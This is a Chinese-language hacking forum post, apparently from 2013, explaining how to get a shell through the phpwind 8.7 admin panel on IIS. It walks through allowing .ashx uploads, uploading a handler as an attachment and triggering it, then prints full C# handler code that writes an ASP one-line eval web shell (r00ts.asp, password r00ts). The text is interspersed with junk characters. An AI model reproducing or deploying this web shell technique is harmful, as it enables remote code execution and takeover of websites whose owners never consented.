找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1955|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
7 @' I0 g5 p* L" a: e1 h- [) }5 T
$ Q) R1 _4 M" Z3 }群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
$ l) e5 j, s# E, a
/ J6 r: s6 T1 E4 c2 z. O- ~( a* l发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
8 N6 ~7 r( l! r* N- C) ^$ e ; y9 a  W& g6 Z3 i. X
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx5 [: ]4 W: i" V; ?8 ~+ e
6 P. n' t, s& Z& \- D; E
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
+ Q& z1 ?4 E! W" J5 Y% A : T) p2 z2 X: ^' I, G) p1 b
下面是代码:- A7 [" t7 ?6 o& E
' {/ S* {. C7 V
<%@ WebHandler Language="C#"Class="Handler" %>1 |6 B& U8 f# d4 ]0 C0 n
using System;8 z5 e3 Y) o! u8 ?& h6 n# U
using System.Web;
0 B0 d3 d  O/ x  _- b; f9 zusing System.IO;
$ \% Z9 }: l8 r* |' `0 Kpublic class Handler : IHttpHandler {
4 E$ V/ A* ]6 I0 upublic void ProcessRequest (HttpContext context) {% w3 n9 J" Z+ K- K
context.Response.ContentType = "text/plain";
9 k" M, V7 L( C. @; z6 ZStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));+ g( Q( ~* F# `3 ?
file1.Write("<%eval request(\"r00ts\")%>");
  l0 R6 q; Z0 @( w, qfile1.Flush();
* m1 w- w8 w7 S' Ofile1.Close();
+ [2 F$ }0 m8 M# q& D7 O}/ K7 `: l) W" |: Z6 d9 q
public bool IsReusable {6 F  N( t# z! o, B
get {
/ h0 F+ F5 ]" p7 h; I7 U2 ereturn false;0 r- }6 j/ g+ x3 Q# }5 C% H
}
3 z- C  t( k2 O5 P}3 F" c- z% [& \7 T* z. w9 B& u) U
}; s' `) v' ~) j! T$ R" \: |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表